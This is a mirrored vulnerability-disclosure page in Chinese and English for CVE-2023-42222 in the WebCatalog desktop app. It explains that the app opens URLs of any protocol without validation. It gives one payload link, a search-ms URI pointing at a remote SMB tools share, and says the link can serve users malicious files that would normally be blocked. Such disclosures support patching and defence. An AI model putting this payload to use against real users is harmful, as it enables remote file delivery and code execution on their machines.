目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2023-42222 PoC — WebCatalog 安全漏洞

来源
https://github.com/itssixtyn3in/CVE-2023-42222
关联漏洞
标题:WebCatalog 安全漏洞 (CVE-2023-42222)
Description:WebCatalog是WebCatalog公司的一个桌面应用,可以改进工作流程并提高工作效率。 WebCatalog 49.0之前版本存在安全漏洞,该漏洞源于不验证 URL 是否用于 http 或 https 资源。
介绍
# CVE-2023-42222

## Vulnerability summary
WebCatalog before version 48.4.0 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource, in some circumstances. This vulnerability allows an attacker to execute code on the victims machine by sending messages containing links with arbitrary protocols. The victim has to interact with the link and sees the URL that is opened.

## Vulnerability Scan output
![SAST](sast.JPG)

## PoC Overview
![PoC](webcatalog_gitbook.gif)

## PoC information
The vulnerability can be confirmed by syncing a page that allows arbitary URLs. If a website is synced that contains search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools then an external SMB connection is created. This can then be used to bypass security protections on the local machine and present malicious files to the user, which would usually be blocked.
文件快照

 [4.0K]  /data/pocs/2d604a14d1675e2dc0a838389811bc77551fcf5e
├── [ 923]  README.md
├── [ 42K]  sast.JPG
└── [1.2M]  webcatalog_gitbook.gif

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。